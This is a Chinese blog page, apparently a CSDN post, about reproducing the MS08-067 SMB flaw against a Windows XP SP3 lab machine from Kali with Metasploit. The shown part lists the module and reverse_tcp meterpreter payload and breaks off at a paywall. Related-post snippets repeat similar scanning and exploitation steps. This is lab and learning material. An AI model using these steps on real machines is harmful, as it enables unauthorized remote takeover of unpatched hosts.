利用ms08_067_netapi漏洞实现远程控制Windows XP sp3

最新推荐文章于 2024-03-25 22:33:43 发布
最新推荐文章于 2024-03-25 22:33:43 发布
阅读量2.9k 收藏 9
点赞数 3
文章标签: Kali windows ms08_067_netapi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CARlos_97/article/details/89503784
版权
本文详细介绍了如何利用MS08-067_netapi漏洞对Windows XP SP3进行远程控制。通过Kali虚拟机和Nmap扫描目标靶机,然后在Metasploit中选择合适的模块和payload,设置靶机信息并执行攻击。实验过程中遇到的错误包括未设置target和创建用户时命令格式错误。最终成功开启靶机的RDP端口,实现了远程操控。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

今天闲来无事,打开Kali来了一波MS08-067-netapi的复现
就是服务器服务中的漏洞可能允许远程执行代码
在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。

实验准备

Kali虚拟机
靶机:Windows XP sp3

实验操作

打开Kali和靶机,ifconfig得到Kali IP 192.168.43.120
通过Nmap 扫描得到靶机 IP 192.168.43.201

进入matesploit
首先连接上postgresql

service postgresql statr

寻找ms08_067_netapi模块

search ms08_067_netapi

使用该模块

use exploit/windows/smb/ms08_067_netapi

顺便加载一下payload

windows/meterpreter/reverse_tcp
最低0.47元/天 解锁文章
CARlos_97
关注
Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)
qq_43093288的博客
03-25 2188
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,,但是我们现在只考虑ms08-067。注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101。
MS08_067漏洞复现与总结
马赛克的博客
02-28 6909
00x00 原理:攻击者利用受害主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓冲区,获取远程代码执行的权限,从而完全控制主机 安全补丁:KB958644 00x01 #准备工作 两台虚拟机,一台为kali ip:10.10.10.131 一台为Windowsxpsp3英文版 ip:10.10.1...
windows xp(sp3)的漏洞补丁
06-18
windows xp(sp3)的漏洞补丁
#windowsxpsp3系统MS10-046漏洞测试
bmxch的博客
01-24 625
一、影响环境 Windows 2000、WindowsXPWindows server 2003Windows Vista、Windows server 2008Windows7 beta。 **二、**实验环境(虚拟机搭建) 目标主机:winxpsp3英文版:192.168.28.133 攻击主机:kaililinux:192.168.28.134 三、攻击过程 先用nmap扫描内部192.168.28.0/24位的网段查看是否有xp系统的主机存活 进入metasploit框架 Msfcons
Windows XP操作系统安全漏洞大搜索(转)
csd3176的博客
08-11 409
Windows XP操作系统安全漏洞大搜索(转)[@more@]   现在很多的电脑用户都将自己的操作系统换成了最新的WINXP系统,但即使是最新的Windows系统,依然还是存在着很多安全隐患,那么怎样保证你的系统安全呢? ...
Windows XPWindows 7系统常见漏洞
weixin_30407099的博客
10-26 222
1.Windows XP系统常见漏洞 Windows XP系统常见的漏洞有UPNP服务漏洞、升级程序漏洞、帮助和支持中心漏洞、压缩文件夹漏洞、服务拒绝漏洞Windows Media Player漏洞、RDP漏洞、VM漏洞、热键漏洞、账号快速切换漏洞等。 (1)UPNP服务漏洞 漏洞描述:允许攻击者执行任意指令。 Windows XP默认启动的UPNP服务存在严重安全漏洞。UPN...
【网络安全】利用MS-08-067漏洞渗透WindowsXP过程
qq_61415450的博客
03-25 1200
网络安全,
Windows漏洞MS08-067
Nanyeer的博客
03-21 1768
MS08-067漏洞(远程命令执行漏洞)的演示
Windows xp Ms08067漏洞复现
hintll的博客
11-18 4165
准备工作: 虚拟机 kali Windows xp sp3中文版 先ping双方的ip,以确保双方的网络可以互通 nmap扫描Windows 命令: cd /usr/share/nmap/scripts nmap --script=vuln 192.168.XXX.XXX 扫描后有漏洞ms08067 用mts进行攻击 先找漏洞利用: search 08_067 运用漏洞: use exploit/windowsexploit/windows/smb/ms08_067_netapi 看参数: show op
简述Windows XPWindows 7系统常见漏洞
黑白程序的博客
10-09 3231
1.Windows XP系统常见漏洞 Windows XP系统常见的漏洞有UPNP服务漏洞、升级程序漏洞、帮助和支持中心漏洞、压缩文件夹漏洞、服务拒绝漏洞Windows Media Player漏洞、RDP漏洞、VM漏洞、热键漏洞、账号快速切换漏洞等。 (1)UPNP服务漏洞 漏洞描述:允许攻击者执行任意指令。 Windows XP默认启动的UPNP服务存在严重安全漏洞。UPNP(Uni
MS08-067漏洞攻击全程演示(图解).
04-28
MS08-067漏洞攻击全程演示(图解)
渗透攻击MS08-067
hmysn的博客
12-22 2161
渗透攻击MS08-067
MS08_067_netapi漏洞复现
weixin_45418565的博客
05-02 940
MS08_067_netapi漏洞复现 winxp的ip地址为192.168.0.101 kali的ip地址为192.168.0.105 确保两台主机能ping通 接着我们使用kali中自带的msf进行攻击 开启postgresql数据库 service postgresql start 启动msf msfconsole 我们利用msf的数据库搜索相应winxp漏洞 search...
Windows漏洞MS08-067远程代码执行漏洞复现及深度防御
华为云官方博客
11-16 9414
摘要:详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程
MS08-067漏洞渗透测试
forget_mt的博客
03-28 9992
提示:靶机 windows XP IP:172.16.5.27 攻击机 kali IP:172.16.5.28 文章目录 前言 漏洞介绍 nmap扫描 MS08-067利用 总结 前言 利用msfconsole控制台的exploit/windows/smb/ms08_067_netapi攻击模块对靶机445端口的攻击过程,成功进入后渗透,开启靶机的3389远程登录 漏洞介绍: ms08_067漏洞是的著名...
Windows XP SP2(MS08-067漏洞复现及利用)
sGanYu
09-03 5905
打开kali,开启msf所依赖的数据库 启动msfconsole 搜寻关于ms08-067有关的漏洞 使用 输入show options显示ms08-067模块所需的参数 配置参数,设置目标操作系统类型为4
远程控制——ms12-020漏洞利用(蓝屏攻击)
wwwwyyyrre的博客
04-22 1465
(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞),远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。官方补丁地址:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-020。
Metasploit攻击xpwindows/smb/ms08_067_netapi
Shiliang1995
10-23 1995
第一步 安装XP虚拟机 这里用的系统版本如下 然后用nmap扫描XP系统的ip地址发现,扫不出来445端口,也就不用metasploit进行攻击 所以先对XP设置一下 编辑注册表HKEY_LOCAL_MACHINE=>SYSTEM=>CurrentControlSet=>Services=>NetBT=>Parameters 在Parameters上右键...
利用ms08-067漏洞远程控制Windowsxp
热门推荐
xyx107的博客
03-03 1万+
1、查找ms08-067:2、使用:3、选择payload:(开始我用的windows/shell/...和windows/meterpreter/reverse_tpc有区别)4、查看options(yes为必填部分):5、输入RHOST(目标靶机)IP和LHOST的IP:6、查看适合的系统类型(简体中文sp3,编号34):7、可选target 0(自动)或自己选择:8、exploit(图中IP...
如何使用Metasploit在Kali Linux环境中利用MS08_067漏洞进行渗透测试?
最新发布
11-09
利用MS08_067漏洞进行渗透测试,首先需要确保你的Kali Linux环境已经搭建好,并安装了Metasploit框架。以下是详细步骤: 参考资源链接:[2022太原理工大学网络攻防实验:MS08_067漏洞与渗透测试]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值